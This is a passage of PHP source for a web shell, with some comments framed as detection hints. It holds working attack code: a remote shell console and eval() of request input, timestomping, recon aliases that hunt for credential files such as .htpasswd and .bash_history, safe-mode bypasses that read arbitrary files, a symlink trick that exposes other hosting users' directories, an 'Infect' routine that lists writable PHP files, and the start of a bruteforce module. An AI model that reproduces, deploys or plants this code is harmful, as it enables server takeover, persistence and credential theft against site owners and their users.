 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
 }
 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
 break;
 // Timestomping: p3 is parsed with strtotime() and applied as both mtime and atime.
 case 'touch':
 if( !empty($_POST['p3']) ) {
 $time = strtotime($_POST['p3']);
 if($time) {
 if(@touch($_POST['p1'],$time,$time))
 die('<script>g(null,null,null,null,"")</script>');
 else {
 echo 'Fail!<script>document.mf.p3.value="";</script>';
 }
 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
 }
 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
 break;
 // Only reached if file creation above failed (p2 is otherwise rewritten to 'edit').
 case 'mkfile':

 break;
 }
 echo '</div>';
 printFooter();
}
537// File tools end ----------------------
538// Console go --------------------
// Pre-canned reconnaissance commands offered in the Console drop-down, keyed by
// label. Entries with an empty command ("Find", "Locate") are group headers.
// For detection engineering these are worth matching verbatim in process-creation or
// auditd/sysmon telemetry when the parent is the web-server worker: setuid/setgid
// sweeps, world-writable sweeps, and locate/find for config, .htpasswd, .bash_history,
// .mysql_history, service.pwd and .fetchmailrc are all credential hunting.
if($os == 'win')
 $aliases = array(
 "List Directory" => "dir",
 "Find index.php in current dir" => "dir /s /w /b index.php",
 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
 "Show active connections" => "netstat -an",
 "Show running services" => "net start",
 "User accounts" => "net user",
 "Show computers" => "net view",
 "ARP Table" => "arp -a",
 "IP Configuration" => "ipconfig /all"
 );
else
 $aliases = array(
 "List dir" => "ls -la",
 "list file attributes on a Linux second extended file system" => "lsattr -va",
 "show opened ports" => "netstat -an | grep -i listen",
 "process status" => "ps aux",
 "Find" => "",
 // setuid/setgid sweeps: privilege-escalation candidates
 "find all suid files" => "find / -type f -perm -04000 -ls",
 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
 "find all sgid files" => "find / -type f -perm -02000 -ls",
 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
 "find config.inc.php files" => "find / -type f -name config.inc.php",
 "find config* files" => "find / -type f -name \"config*\"",
 "find config* files in current dir" => "find . -type f -name \"config*\"",
 // world-writable sweeps: persistence / lateral-write candidates
 "find all writable folders and files" => "find / -perm -2 -ls",
 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
 "find all service.pwd files" => "find / -type f -name service.pwd",
 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
 "find all .htpasswd files" => "find / -type f -name .htpasswd",
 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
 "find all .bash_history files" => "find / -type f -name .bash_history",
 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
 "Locate" => "",
 "locate httpd.conf files" => "locate httpd.conf",
 "locate vhosts.conf files" => "locate vhosts.conf",
 "locate proftpd.conf files" => "locate proftpd.conf",
 "locate psybnc.conf files" => "locate psybnc.conf",
 "locate my.conf files" => "locate my.conf",
 "locate admin.php files" =>"locate admin.php",
 "locate cfg.php files" => "locate cfg.php",
 "locate conf.php files" => "locate conf.php",
 "locate config.dat files" => "locate config.dat",
 "locate config.php files" => "locate config.php",
 "locate config.inc files" => "locate config.inc",
 "locate config.inc.php" => "locate config.inc.php",
 "locate config.default.php files" => "locate config.default.php",
 "locate config* files " => "locate config",
 "locate .conf files"=>"locate '.conf'",
 "locate .pwd files" => "locate '.pwd'",
 "locate .sql files" => "locate '.sql'",
 "locate .htpasswd files" => "locate '.htpasswd'",
 "locate .bash_history files" => "locate '.bash_history'",
 "locate .mysql_history files" => "locate '.mysql_history'",
 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
 "locate backup files" => "locate backup",
 "locate dump files" => "locate dump",
 "locate priv files" => "locate priv"
 );
601
// "Console" module: executes POST p1 as a shell command via ex(). A non-empty p2
// appends " 2>&1" so stderr is captured too. Two transport modes:
//  - AJAX (POST field 'ajax' present): replies "<length>\n<javascript>" which the
//    client eval()s; the script appends "$ <cmd>\n<output>" to the console textarea.
//  - Plain: renders the full page with the command and output in the textarea.
// The last-used mode and the stderr flag are remembered in the session under keys
// derived from md5(HTTP_HOST).
// A trailing "cd <dir>" in the command is mirrored server-side with chdir() so the
// shell's working directory follows the operator; the new cwd is pushed back into
// the hidden form. Detection hint: the response fragment "document.cf.output.value+="
// is specific to this console.
function actionConsole() {
 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
 $_POST['p1'] .= ' 2>&1';
 } elseif(!empty($_POST['p1']))
 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = 0;

 // AJAX branch: emit only the JavaScript fragment, prefixed with its byte length.
 if(isset($_POST['ajax'])) {
 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
 ob_start();
 echo "document.cf.cmd.value='';\n";
 // Command and output are escaped for a single-quoted JS string, then transcoded
 // from the page charset to UTF-8.
 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
 if(@chdir($match[1])) {
 $GLOBALS['cwd'] = @getcwd();
 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
 }
 }
 echo "document.cf.output.value+='".$temp."';";
 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
 $temp = ob_get_clean();
 echo strlen($temp), "\n", $temp;
 exit;
 }
 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
 printHeader();
 // Client-side command history: Up/Down arrows (keyCodes 38/40) walk the cmds array.
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
 var n = (window.Event) ? e.which : e.keyCode;
 if(n == 38) {
 cur--;
 if(cur>=0)
 document.cf.cmd.value = cmds[cur];
 else
 cur++;
 } else if(n == 40) {
 cur++;
 if(cur < cmds.length)
 document.cf.cmd.value = cmds[cur];
 else
 cur--;
 }
}
function add(cmd) {
 cmds.pop();
 cmds.push(cmd);
 cmds.push('');
 cur = cmds.length-1;
}
</script>";
 // Console form: "clear" is handled purely client-side; otherwise the command goes
 // through a() (AJAX) or g() (full page) with p2 = 1 when stderr redirection is ticked.
 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
 foreach($GLOBALS['aliases'] as $n => $v) {
 if($v == '') {
 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
 continue;
 }
 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
 }

 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}else{g(null,null,document.cf.alias.value,document.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
 // Plain (non-AJAX) execution: the command runs here and its output is escaped into
 // the textarea.
 if(!empty($_POST['p1'])) {
 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
 }
 echo '</textarea><table style="border:1px solid #000;background-color:#000;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
 echo '</form></div><script>document.cf.cmd.focus();</script>';
 printFooter();
}
673// Console end --------------------
674// PHP -----------------------
// "Php" module: eval()s POST p1 as PHP code, in the AJAX transport or inline in the
// page, and optionally shows phpinfo() (p2 == 'info') with its default CSS stripped.
// This is arbitrary code execution independent of disable_functions, so disabling
// exec-family functions alone does not neutralise the shell. phpinfo() also exposes
// environment variables, which on many deployments include credentials.
// The AJAX reply follows the same "<length>\n<javascript>" framing as the console and
// writes into the #PhpOutput element.
function actionPhp() {
 if( isset($_POST['ajax']) ) {
 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
 ob_start();
 eval($_POST['p1']);
 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
 echo strlen($temp), "\n", $temp;
 exit;
 }
 printHeader();
 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
 echo '<h1>PHP info</h1><div class=content>';
 ob_start();
 phpinfo();
 $tmp = ob_get_clean();
 // Strip phpinfo's own page-level styles and demote its h1 so it nests in this page.
 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
 $tmp = preg_replace('!h1!msiU','h2',$tmp);
 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
 echo $tmp;
 echo '</div><br>';
 }
 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 // Code editor form; the submitted code is echoed back (escaped) into the textarea.
 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
 // Non-AJAX execution path: second eval() of the same request input.
 if(!empty($_POST['p1'])) {
 ob_start();
 eval($_POST['p1']);
 echo htmlspecialchars(ob_get_clean());
 }
 echo '</pre></div>';
 printFooter();
}
710// PHP end --------------------
711// File manager go --------------------
712function actionFilesMan() {
713 printHeader();
714 echo '<h1>File manager</h1><div class=content>';
715 if(isset($_POST['p1'])) {
716 switch($_POST['p1']) {
717 case 'uploadFile':
718 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
719 echo "Can't upload file!";
720 break;
721 break;
722 case 'mkdir':
723 if(!@mkdir($_POST['p2']))
724 echo "Can't create new dir";
725 break;
726 case 'delete':
727 function deleteDir($path) {
728 $path = (substr($path,-1)=='/') ? $path:$path.'/';
729 $dh = opendir($path);
730 while ( ($item = readdir($dh) ) !== false) {
731 $item = $path.$item;
732 if ( (basename($item) == "..") || (basename($item) == ".") )
733 continue;
734 $type = filetype($item);
735 if ($type == "dir")
736 deleteDir($item);
737 else
738 @unlink($item);
739 }
740 closedir($dh);
741 rmdir($path);
742 }
743 if(is_array(@$_POST['f']))
744 foreach($_POST['f'] as $f) {
745 $f = urldecode($f);
746 if(is_dir($f))
747 deleteDir($f);
748 else
749 @unlink($f);
750 }
751 break;
752 case 'paste':
753 if($_SESSION['act'] == 'copy') {
754 function copy_paste($c,$s,$d){
755 if(is_dir($c.$s)){
756 mkdir($d.$s);
757 $h = opendir($c.$s);
758 while (($f = readdir($h)) !== false)
759 if (($f != ".") and ($f != "..")) {
760 copy_paste($c.$s.'/',$f, $d.$s.'/');
761 }
762 } elseif(is_file($c.$s)) {
763 @copy($c.$s, $d.$s);
764 }
765 }
766 foreach($_SESSION['f'] as $f)
767 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
768 } elseif($_SESSION['act'] == 'move') {
769 function move_paste($c,$s,$d){
770 if(is_dir($c.$s)){
771 mkdir($d.$s);
772 $h = opendir($c.$s);
773 while (($f = readdir($h)) !== false)
774 if (($f != ".") and ($f != "..")) {
775 copy_paste($c.$s.'/',$f, $d.$s.'/');
776 }
777 } elseif(is_file($c.$s)) {
778 @copy($c.$s, $d.$s);
779 }
780 }
781 foreach($_SESSION['f'] as $f)
782 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
783 }
784 unset($_SESSION['f']);
785 break;
786 default:
787 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
788 $_SESSION['act'] = @$_POST['p1'];
789 $_SESSION['f'] = @$_POST['f'];
790 foreach($_SESSION['f'] as $k => $f)
791 $_SESSION['f'][$k] = urldecode($f);
792 $_SESSION['cwd'] = @$_POST['c'];
793 }
794 break;
795 }
796 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
797 }
798 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
799 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
800 global $sort;
801 $sort = array('name', 1);
802 if(!empty($_POST['p1'])) {
803 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
804 $sort = array($match[1], (int)$match[2]);
805 }
806?>
807<script>
808 function sa() {
809 for(i=0;i<document.files.elements.length;i++)
810 if(document.files.elements[i].type == 'checkbox')
811 document.files.elements[i].checked = document.files.elements[0].checked;
812 }
813</script>
814<table width='100%' class='main' cellspacing='0' cellpadding='2'>
815<form name=files method=post>
816<?php
817 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
818 $dirs = $files = $links = array();
819 $n = count($dirContent);
820 for($i=0;$i<$n;$i++) {
821 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
822 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
823 $tmp = array('name' => $dirContent[$i],
824 'path' => $GLOBALS['cwd'].$dirContent[$i],
825 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
826 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
827 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
828 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
829 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
830 );
831 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
832 $files[] = array_merge($tmp, array('type' => 'file'));
833 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
834 $links[] = array_merge($tmp, array('type' => 'link'));
835 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
836 $dirs[] = array_merge($tmp, array('type' => 'dir'));
837 }
838 $GLOBALS['sort'] = $sort;
839 function cmp($a, $b) {
840 if($GLOBALS['sort'][0] != 'size')
841 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
842 else
843 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
844 }
845 usort($files, "cmp");
846 usort($dirs, "cmp");
847 usort($links, "cmp");
848 $files = array_merge($dirs, $links, $files);
849 $l = 0;
850 foreach($files as $f) {
851 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
852 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
853 $l = $l?0:1;
854 }
855 ?>
856 <tr><td colspan=7>
857 <input type=hidden name=a value='FilesMan'>
858 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
859 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
860 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
861 </form></table></div>
862 <?php
863 printFooter();
864}
865// File manager end --------------------
866// String tools go --------------------
867function actionStringTools() {
868 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
869 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
870 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
871 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
872 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
873 $stringTools = array(
874 'Base64 encode' => 'base64_encode',
875 'Base64 decode' => 'base64_decode',
876 'Url encode' => 'urlencode',
877 'Url decode' => 'urldecode',
878 'Full urlencode' => 'full_urlencode',
879 'md5 hash' => 'md5',
880 'sha1 hash' => 'sha1',
881 'crypt' => 'crypt',
882 'CRC32' => 'crc32',
883 'ASCII to HEX' => 'ascii2hex',
884 'HEX to ASCII' => 'hex2ascii',
885 'HEX to DEC' => 'hexdec',
886 'HEX to BIN' => 'hex2bin',
887 'DEC to HEX' => 'dechex',
888 'DEC to BIN' => 'decbin',
889 'BIN to HEX' => 'binhex',
890 'BIN to DEC' => 'bindec',
891 'String to lower case' => 'strtolower',
892 'String to upper case' => 'strtoupper',
893 'Htmlspecialchars' => 'htmlspecialchars',
894 'String length' => 'strlen',
895 );
896 if(isset($_POST['ajax'])) {
897 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
898 ob_start();
899 if(in_array($_POST['p1'], $stringTools))
900 echo $_POST['p1']($_POST['p2']);
901 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
902 echo strlen($temp), "\n", $temp;
903 exit;
904 }
905 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
906 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
907 printHeader();
908 echo '<h1>String conversions</h1><div class=content>';
909 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
910 foreach($stringTools as $k => $v)
911 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
912 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
913 if(!empty($_POST['p1'])) {
914 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
915 }
916 echo"</pre></div><br><h1>Search files:</h1><div class=content>
917 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
918 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
919 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
920 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
921 <tr><td></td><td><input type='submit' value='>>'></td></tr>
922 </table></form>";
923 function printRecursiveGlob($path) {
924 if(substr($path, -1) != '/')
925 $path.='/';
926 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
927 if(is_array($paths)&&@count($paths)) {
928 foreach($paths as $item) {
929 if(@is_dir($item)){
930 if($path!=$item)
931 printRecursiveGlob($item);
932 } else {
933 if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
934 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
935 }
936 }
937 }
938 }
939 if(@$_POST['p3'])
940 printRecursiveGlob($_POST['c']);
941 echo "</div><br><h1>Search for hash:</h1><div class=content>
942 <form method='post' target='_blank' name='hf'>
943 <input type='text' name='hash' style='width:200px;'><br>
944 <input type='hidden' name='act' value='find'/>
945 <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
946 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
947 <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
948 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
949 <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
950 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
951 <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
952 </form></div>";
953 printFooter();
954}
955// String tools end --------------------
956// Safe mode go ------------------------
957function actionSafeMode() {
958 $temp='';
959 ob_start();
960 switch($_POST['p1']) {
961 case 1:
962 $temp=@tempnam($test, 'cx');
963 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
964 echo @file_get_contents($temp);
965 unlink($temp);
966 } else
967 echo 'Sorry... Can\'t open file';
968 break;
969 case 2:
970 $files = glob($_POST['p2'].'*');
971 if( is_array($files) )
972 foreach ($files as $filename)
973 echo $filename."\n";
974 break;
975 case 3:
976 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
977 curl_exec($ch);
978 break;
979 case 4:
980 ini_restore("safe_mode");
981 ini_restore("open_basedir");
982 include($_POST['p2']);
983 break;
984 case 5:
985 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
986 $uid = @posix_getpwuid($_POST['p2']);
987 if ($uid)
988 echo join(':',$uid)."\n";
989 }
990 break;
991 case 6:
992 if(!function_exists('imap_open'))break;
993 $stream = imap_open($_POST['p2'], "", "");
994 if ($stream == FALSE)
995 break;
996 echo imap_body($stream, 1);
997 imap_close($stream);
998 break;
999 }
1000 $temp = ob_get_clean();
1001 printHeader();
1002 echo '<h1>Safe mode bypass</h1><div class=content>';
1003 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
1004 if($temp)
1005 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1006 echo '</div>';
1007 printFooter();
1008}
1009// Safe mode end ---------------------
1010// Logout go -------------------------
1011function actionLogout() {
1012 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1013 echo 'bye!';
1014}
1015// Logout end -------------------------
1016// Suicide go -------------------------
1017function actionSelfRemove() {
1018 printHeader();
1019 if($_POST['p1'] == 'yes') {
1020 if(@unlink(SELF_PATH))
1021 die('Shell has been removed');
1022 else
1023 echo 'unlink error!';
1024 }
1025 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1026 printFooter();
1027}
1028// Suicide end -------------------------
1029function actionTools() {
1030 printHeader();
1031
1032 printFooter();
1033}
1034// Domains go -------------------------
1035function actionDomains() {
1036 printHeader();
1037 error_reporting(0);
1038echo "<title>#Domains & Users</title>";
1039mkdir("sym");
1040symlink("/","0/x.txt");
1041$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
1042$f = fopen ('sym/.htaccess','w');
1043 fwrite($f , $c);
1044
1045$d0mains = @file("/etc/named.conf");
1046if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]"); }
1047echo "<table align=center border=1>
1048<tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
1049foreach($d0mains as $d0main){
1050if(eregi("zone",$d0main)){
1051preg_match_all('#zone "(.*)"#', $d0main, $domains);
1052flush();
1053if(strlen(trim($domains[1][0])) > 2){
1054$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1055echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>"; flush();
1056}}}
1057echo "</table>
1058<p align='center'>
1059FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a
1060href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br>
1061</p>
1062";
1063 printFooter();
1064}
1065// Domains end -----------------------
1066// Infect go -------------------------
1067function actionInfect() {
1068 printHeader();
1069 echo '<h1>Infect</h1><div class=content>';
1070 if($_POST['p1'] == 'infect') {
1071 $target=$_SERVER['DOCUMENT_ROOT'];
1072 function ListFiles($dir) {
1073 if($dh = opendir($dir)) {
1074 $files = Array();
1075 $inner_files = Array();
1076 while($file = readdir($dh)) {
1077 if($file != "." && $file != "..") {
1078 if(is_dir($dir . "/" . $file)) {
1079 $inner_files = ListFiles($dir . "/" . $file);
1080 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1081 } else {
1082 array_push($files, $dir . "/" . $file);
1083 }
1084 }
1085 }
1086 closedir($dh);
1087 return $files;
1088 }
1089 }
1090 foreach (ListFiles($target) as $key=>$file){
1091 $nFile = substr($file, -4, 4);
1092 if($nFile == ".php" ){
1093 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1094 echo "$file<br>";
1095 $i++;
1096 }
1097 }
1098 }
1099 echo "<font color=red size=14>$i</font>";
1100 }else{
1101 echo "<form method=post><input type=submit value=Infect name=infet></form>";
1102 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1103 }
1104 printFooter();
1105}
1106// Infect end -----------------------
1107// Bruteforce go --------------------
1108function actionBruteforce() {
1109 printHeader();
1110 if( isset($_POST['proto']) ) {
1111 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
